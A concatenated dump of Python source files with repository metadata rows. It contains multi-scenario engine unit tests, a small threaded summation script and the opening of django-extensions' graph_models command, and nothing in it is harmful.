'.multi_scenarios.scenario_2.Disc3.z'] = 1.5
self.exec_eng.load_study_from_input_dict(private_val)
self.exec_eng.execute()
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.x'), x1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.x'), x2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x1 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2 + b2)
def test_02_multi_scenario_of_scatter_name1_x_trade_variable(self):
# scatter build map
ac_map = {'input_name': 'name_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac',
'gather_ns': 'ns_scenario',
'ns_to_update': ['ns_data_ac']}
self.exec_eng.smaps_manager.add_build_map('name_list', ac_map)
# scenario build map
scenario_map = {'input_name': 'scenario_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'scenario_name',
'scatter_ns': 'ns_scenario',
'gather_ns': 'ns_scatter_scenario',
'ns_to_update': ['ns_disc3', 'ns_barrierr', 'ns_out_disc3']}
self.exec_eng.smaps_manager.add_build_map(
'scenario_list', scenario_map)
# shared namespace
self.exec_eng.ns_manager.add_ns('ns_barrierr', 'MyCase')
self.exec_eng.ns_manager.add_ns(
'ns_scatter_scenario', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_disc3', 'MyCase.multi_scenarios.Disc3')
self.exec_eng.ns_manager.add_ns(
'ns_out_disc3', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_data_ac', 'MyCase')
# instantiate factory # get instantiator from Discipline class
builder_list = self.factory.get_builder_from_process(repo=self.repo,
mod_id='test_disc1_scenario')
scatter_list = self.exec_eng.factory.create_multi_scatter_builder_from_list(
'name_list', builder_list=builder_list, autogather=True)
mod_list = f'{self.base_path}.disc3_scenario.Disc3'
disc3_builder = self.exec_eng.factory.get_builder_from_module(
'Disc3', mod_list)
scatter_list.append(disc3_builder)
multi_scenarios = self.exec_eng.factory.create_simple_multi_scenario_builder(
'multi_scenarios', 'scenario_list', scatter_list, autogather=True)
self.exec_eng.factory.set_builders_to_coupling_builder(
multi_scenarios)
self.exec_eng.configure()
self.exec_eng.display_treeview_nodes()
dict_values = {
f'{self.study_name}.multi_scenarios.trade_variables': {'name_1.x': 'float'}}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_df = pd.DataFrame(columns=['scenario_name', 'name_1.x'])
self.assertTrue(scenario_df.equals(
self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df')))
x1 = 2.
x2 = 4.
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'name_1.x'])
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
self.assertTrue(scenario_df.equals(
self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df')))
dict_values[self.study_name +
'.multi_scenarios.name_list'] = ['name_1', 'name_2']
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes(display_variables='var_name')
private_val = {}
scenario_list = ['scenario_1', 'scenario_2']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
x2b = 5.0
private_val[self.study_name + '.name_1.a'] = a1
private_val[self.study_name + '.name_2.a'] = a2
private_val[self.study_name + '.name_2.x'] = x2b
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
private_val[self.study_name +
'.multi_scenarios.scenario_1.Disc3.z'] = 1.2
private_val[self.study_name +
'.multi_scenarios.scenario_2.Disc3.z'] = 1.5
dict_values.update(private_val)
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.execute()
x1 = 2
x2 = 4
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.x'), x1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.x'), x2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x2b + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2b + b2)
def test_03_consecutive_configure(self):
# scatter build map
ac_map = {'input_name': 'name_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac',
'gather_ns': 'ns_scenario',
'ns_to_update': ['ns_data_ac']}
self.exec_eng.smaps_manager.add_build_map('name_list', ac_map)
# scenario build map
scenario_map = {'input_name': 'scenario_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'scenario_name',
'scatter_ns': 'ns_scenario',
'gather_ns': 'ns_scatter_scenario',
'ns_to_update': ['ns_disc3', 'ns_barrierr', 'ns_out_disc3']}
self.exec_eng.smaps_manager.add_build_map(
'scenario_list', scenario_map)
# shared namespace
self.exec_eng.ns_manager.add_ns('ns_barrierr', 'MyCase')
self.exec_eng.ns_manager.add_ns(
'ns_scatter_scenario', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_disc3', 'MyCase.multi_scenarios.Disc3')
self.exec_eng.ns_manager.add_ns(
'ns_out_disc3', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_data_ac', 'MyCase')
# instantiate factory # get instantiator from Discipline class
builder_list = self.factory.get_builder_from_process(repo=self.repo,
mod_id='test_disc1_scenario')
scatter_list = self.exec_eng.factory.create_multi_scatter_builder_from_list(
'name_list', builder_list=builder_list, autogather=True)
mod_path = f'{self.base_path}.disc3_scenario.Disc3'
disc3_builder = self.exec_eng.factory.get_builder_from_module(
'Disc3', mod_path)
scatter_list.append(disc3_builder)
multi_scenarios = self.exec_eng.factory.create_simple_multi_scenario_builder(
'multi_scenarios', 'scenario_list', scatter_list, autogather=True, gather_node='Post-processing')
self.exec_eng.factory.set_builders_to_coupling_builder(
multi_scenarios)
self.exec_eng.configure()
self.exec_eng.display_treeview_nodes()
x1 = 2
x2 = 4
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x'])
dict_values = {f'{self.study_name}.multi_scenarios.trade_variables': {'x': 'float'},
f'{self.study_name}.multi_scenarios.name_list': ['name_1', 'name_2'],
f'{self.study_name}.multi_scenarios.scenario_df': scenario_df}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'scenario_1', 'scenario_2'])
scenario_df = pd.DataFrame(
[['scenario_1', x1]], columns=['scenario_name', 'x'])
dict_values = {self.study_name +
'.multi_scenarios.scenario_df': scenario_df}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'scenario_1'])
dict_values = {
self.study_name + '.multi_scenarios.name_list': ['name_1', 'name_2', 'name_3']}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'scenario_1'])
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios.scenario_1.Disc1'):
if isinstance(disc, SoSDisciplineScatter):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'name_1', 'name_2', 'name_3'])
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x'])
dict_values = {self.study_name + '.multi_scenarios.scenario_df': scenario_df,
self.study_name + '.multi_scenarios.name_list': ['name_1', 'name_2']}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'scenario_1', 'scenario_2'])
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios.scenario_1.Disc1'):
if isinstance(disc, SoSDisciplineScatter):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'name_1', 'name_2'])
private_val = {}
scenario_list = ['scenario_1', 'scenario_2']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
private_val[self.study_name + '.name_1.a'] = a1
private_val[self.study_name + '.name_2.a'] = a2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
private_val[self.study_name +
'.multi_scenarios.scenario_1.Disc3.z'] = 1.2
private_val[self.study_name +
'.multi_scenarios.scenario_2.Disc3.z'] = 1.5
self.exec_eng.load_study_from_input_dict(private_val)
self.exec_eng.execute()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(
[key for key in list(disc.get_data_io_dict('in').keys()) if key not in disc.NUM_DESC_IN], ['trade_variables', 'scenario_list', 'scenario_df', 'scenario_dict'])
self.assertDictEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.x_dict'), {'scenario_1': 2, 'scenario_2': 4})
self.assertListEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_list'), ['scenario_1', 'scenario_2'])
self.assertDictEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_dict'), {'scenario_1': {'x': 2}, 'scenario_2': {'x': 4}})
self.assertListEqual(
list(self.exec_eng.dm.get_disciplines_with_name(
f'{self.study_name}')[0].get_sosdisc_outputs().keys()),
['residuals_history'])
elif isinstance(disc, SoSScatterData):
self.assertListEqual(
[key for key in list(disc.get_data_io_dict('in').keys())if key not in disc.NUM_DESC_IN], ['x_dict', 'scenario_list'])
self.assertListEqual(
list(disc.get_data_io_dict('out').keys()), ['scenario_1.x', 'scenario_2.x'])
self.assertDictEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.x_dict'), {'scenario_1': 2, 'scenario_2': 4})
self.assertEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_1.x'), 2)
self.assertEqual(self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_2.x'), 4)
def test_04_dump_and_load_after_execute(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
x1 = 2
x2 = 4
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x'])
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'x': 'float'}
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
scenario_list = ['scenario_1', 'scenario_2']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.scenario_1.Disc3.z'] = 1.2
dict_values[self.study_name +
'.multi_scenarios.scenario_2.Disc3.z'] = 1.5
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.execute()
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x1 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2 + b2)
dump_dir = join(self.root_dir, self.namespace)
BaseStudyManager.static_dump_data(
dump_dir, self.exec_eng, DirectLoadDump())
exec_eng2 = ExecutionEngine(self.namespace)
builders = exec_eng2.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
exec_eng2.factory.set_builders_to_coupling_builder(builders)
exec_eng2.configure()
BaseStudyManager.static_load_data(
dump_dir, exec_eng2, DirectLoadDump())
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x1 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2 + b2)
# Clean the dump folder at the end of the test
self.dirs_to_del.append(
join(self.root_dir, self.namespace))
def test_05_several_trade_variables(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
x1 = 2
x2 = 4
x3 = 0
x4 = 3
scenario_df = pd.DataFrame(
[['scenario_1', x1, x3], ['scenario_2', x1, x4], ['scenario_3', x2, x3]], columns=['scenario_name', 'name_1.x', 'name_2.x'])
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_1.x': 'float', 'name_2.x': 'float'}
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
scenario_list = ['scenario_1', 'scenario_2',
'scenario_3']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
self.exec_eng.execute()
scenario_dict = {'scenario_1': {'name_1.x': x1, 'name_2.x': x3},
'scenario_2': {'name_1.x': x1, 'name_2.x': x4},
'scenario_3': {'name_1.x': x2, 'name_2.x': x3}}
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_dict'), scenario_dict)
self.assertDictEqual(self.exec_eng.dm.get_value('MyCase.multi_scenarios.name_1.x_dict'), {
'scenario_1': x1, 'scenario_2': x1, 'scenario_3': x2})
self.assertDictEqual(self.exec_eng.dm.get_value('MyCase.multi_scenarios.name_2.x_dict'), {
'scenario_1': x3, 'scenario_2': x4, 'scenario_3': x3})
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x3 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x4 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_3.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_3.name_2.y'), a2 * x3 + b2)
def test_06_trade_on_name_list(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
scenario_df = pd.DataFrame(
[['scenario_A', ['name_1']], ['scenario_B', ['name_1', 'name_2']], ['scenario_C', ['name_1', 'name_2', 'name_3']]], columns=['scenario_name', 'name_list'])
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_list': 'string_list'}
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
scenario_list = ['scenario_A', 'scenario_B',
'scenario_C']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
a3 = 10
b3 = 0
x = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.name_3.a'] = a3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2
dict_values[self.study_name +
'.multi_scenarios.scenario_A.Disc1.name_1.b'] = b1
dict_values[self.study_name +
'.multi_scenarios.scenario_B.Disc1.name_1.b'] = b1
dict_values[self.study_name +
'.multi_scenarios.scenario_B.Disc1.name_2.b'] = b2
dict_values[self.study_name +
'.multi_scenarios.scenario_C.Disc1.name_1.b'] = b1
dict_values[self.study_name +
'.multi_scenarios.scenario_C.Disc1.name_2.b'] = b2
dict_values[self.study_name +
'.multi_scenarios.scenario_C.Disc1.name_3.b'] = b3
dict_values[self.study_name + '.name_1.x'] = x
dict_values[self.study_name + '.name_2.x'] = x
dict_values[self.study_name + '.name_3.x'] = x
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = {'scenario_A': {'name_list': ['name_1']},
'scenario_B': {'name_list': ['name_1', 'name_2']},
'scenario_C': {'name_list': ['name_1', 'name_2', 'name_3']}}
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_dict'), scenario_dict)
dict_values[f'{self.study_name}.multi_scenarios.name_list_list'] = [
['name_1', 'name_2'], ['name_1', 'name_2', 'name_3']]
dict_values[self.study_name +
'.multi_scenarios.scenario_A.Disc1.name_2.b'] = b2
dict_values[self.study_name +
'.multi_scenarios.scenario_B.Disc1.name_3.b'] = b3
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
self.exec_eng.execute()
y1 = a1 * x + b1
y2 = a2 * x + b2
y3 = a3 * x + b3
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_A.y_dict'), {'name_1': y1})
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_B.y_dict'), {'name_1': y1, 'name_2': y2})
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_C.y_dict'), {'name_1': y1, 'name_2': y2, 'name_3': y3})
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.y_dict'), {'scenario_A.name_1': y1,
'scenario_B.name_1': y1,
'scenario_B.name_2': y2,
'scenario_C.name_1': y1,
'scenario_C.name_2': y2,
'scenario_C.name_3': y3})
def test_07_simple_multi_scenarios_without_trade_variables(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
scenario_df = pd.DataFrame(
[['scenario_A'], ['scenario_B'], ['scenario_C']], columns=['scenario_name'])
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
scenario_list = ['scenario_A', 'scenario_B',
'scenario_C']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
x = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2
dict_values[self.study_name +
f'.multi_scenarios.{scenario}.Disc1.name_1.b'] = b1
dict_values[self.study_name +
f'.multi_scenarios.{scenario}.Disc1.name_2.b'] = b2
dict_values[self.study_name + '.name_1.x'] = x
dict_values[self.study_name + '.name_2.x'] = x
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.trade_variables'), {})
self.assertListEqual(
self.exec_eng.dm.get_all_namespaces_from_var_name('scenario_dict'), [])
def test_08_changing_trade_variables(self):
builders = self.exec_eng.factory.get_builder_from_process(
repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario')
self.exec_eng.factory.set_builders_to_coupling_builder(
builders)
self.exec_eng.configure()
dict_values = {}
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_1.x': 'float', 'name_2.x': 'float'}
self.exec_eng.load_study_from_input_dict(dict_values)
scenario_df = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_df')
self.assertTrue(scenario_df.equals(pd.DataFrame(
columns=['scenario_name', 'name_1.x', 'name_2.x'])))
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_list': 'string_list'}
self.exec_eng.load_study_from_input_dict(dict_values)
scenario_df = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_df')
self.assertTrue(scenario_df.equals(pd.DataFrame(
columns=['scenario_name', 'name_list'])))
scenario_df = pd.DataFrame([['scenario_1', ['name_1', 'name_2']], [
'scenario_2', ['name_3']]], columns=['scenario_name', 'name_list'])
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_dict')
self.assertDictEqual(scenario_dict, {'scenario_1': {'name_list': [
'name_1', 'name_2']}, 'scenario_2': {'name_list': ['name_3']}})
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_list': 'string_list', 'name_1.x': 'float', 'name_2.x': 'float'}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_dict')
self.assertDictEqual(scenario_dict, {'scenario_1': {'name_list': ['name_1', 'name_2'], 'name_1.x': np.nan, 'name_2.x': np.nan}, 'scenario_2': {
'name_list': ['name_3'], 'name_1.x': np.nan, 'name_2.x': np.nan}})
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = {
'name_1.x': 'float', 'name_2.x': 'float'}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = self.exec_eng.dm.get_value(
f'{self.study_name}.multi_scenarios.scenario_dict')
self.assertDictEqual(scenario_dict, {'scenario_1': {'name_1.x': np.nan, 'name_2.x': np.nan}, 'scenario_2': {
'name_1.x': np.nan, 'name_2.x': np.nan}})
x1 = 2
x2 = 4
x3 = 0
x4 = 3
scenario_df = pd.DataFrame(
[['scenario_1', x1, x3], ['scenario_2', x1, x4], ['scenario_3', x2, x3]], columns=['scenario_name', 'name_1.x', 'name_2.x'])
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [
'name_1', 'name_2']
scenario_list = ['scenario_1', 'scenario_2',
'scenario_3']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
dict_values[self.study_name + '.name_1.a'] = a1
dict_values[self.study_name + '.name_2.a'] = a2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
dict_values[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
dict_values[self.study_name +
'.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_dict = {'scenario_1': {'name_1.x': x1, 'name_2.x': x3},
'scenario_2': {'name_1.x': x1, 'name_2.x': x4},
'scenario_3': {'name_1.x': x2, 'name_2.x': x3}}
self.assertDictEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_dict'), scenario_dict)
if '__main__' == __name__:
cls = TestSimpleMultiScenario()
cls.setUp()
cls.test_06_trade_on_name_list()
| 44.454446 | 180 | 0.602499 |
386eea48ae59488107d3b8bf92b860dbc71387be | 431 | py | Python | 20160507_4.py | JaeGyu/PythonEx_1 | e67053db6ca7431c3dd66351c190c53229e3f141 | [
"MIT"
] | null | null | null | 20160507_4.py | JaeGyu/PythonEx_1 | e67053db6ca7431c3dd66351c190c53229e3f141 | [
"MIT"
] | null | null | null | 20160507_4.py | JaeGyu/PythonEx_1 | e67053db6ca7431c3dd66351c190c53229e3f141 | [
"MIT"
] | null | null | null | #_*_ coding: utf-8 _*_
from threading import Thread
def do_work(start, end, result):
sum = 0
for i in range(start, end):
sum += i
result.append(sum)
return
if __name__ == "__main__":
START, END = 0, 20000000
result = list()
th1 = Thread(target=do_work, args=(START, END/2, result))
th2 = Thread(target=do_work, args=(END/2, END, result))
th1.start()
th2.start()
th1.join()
th2.join()
print "Result : ", sum(result) | 20.52381 | 58 | 0.663573 |
496878601bdbd8ab8bae6726cea8bbfc4d020ce6 | 12,021 | py | Python | django_extensions/management/commands/graph_models.py | kaozdl/django-extensions | bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36 | [
"MIT"
] | null | null | null | django_extensions/management/commands/graph_models.py | kaozdl/django-extensions | bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36 | [
"MIT"
] | null | null | null | django_extensions/management/commands/graph_models.py | kaozdl/django-extensions | bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import sys
import json
import os
import tempfile
import six
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django_extensions.management.modelviz import ModelGraph, generate_dot
from django_extensions.management.utils import signalcommand
try:
import pygraphviz
HAS_PYGRAPHVIZ = True
except ImportError:
HAS_PYGRAPHVIZ = False
try:
try:
import pydotplus as pydot
except ImportError:
import pydot
HAS_PYDOT = True
except ImportError:
HAS_PYDOT = False
class Command(BaseCommand):
help = "Creates a GraphViz dot file for the specified app names. You can pass multiple app names and they will all be combined into a single model. Output is usually directed to a dot file."
can_import_settings = True
def __init__(self, *args, **kwargs):
"""
Allow defaults for arguments to be set in settings.GRAPH_MODELS.
Each argument in self.arguments is a dict where the key is the
space-separated args and the value is our kwarg dict.
The default from settings is keyed as the long arg name with '--'
removed and any '-' replaced by '_'. For example, the default value for
--disable-fields can be set in settings.GRAPH_MODELS['disable_fields'].
"""
self.arguments = {
'--pygraphviz': {
'action': 'store_true',
'default': False,
'dest': 'pygraphviz',
'help': 'Output graph data as image using PyGraphViz.',
},
'--pydot': {
'action': 'store_true',
'default': False,
'dest': 'pydot',
'help': 'Output graph data as image using PyDot(Plus).',
},
'--dot': {
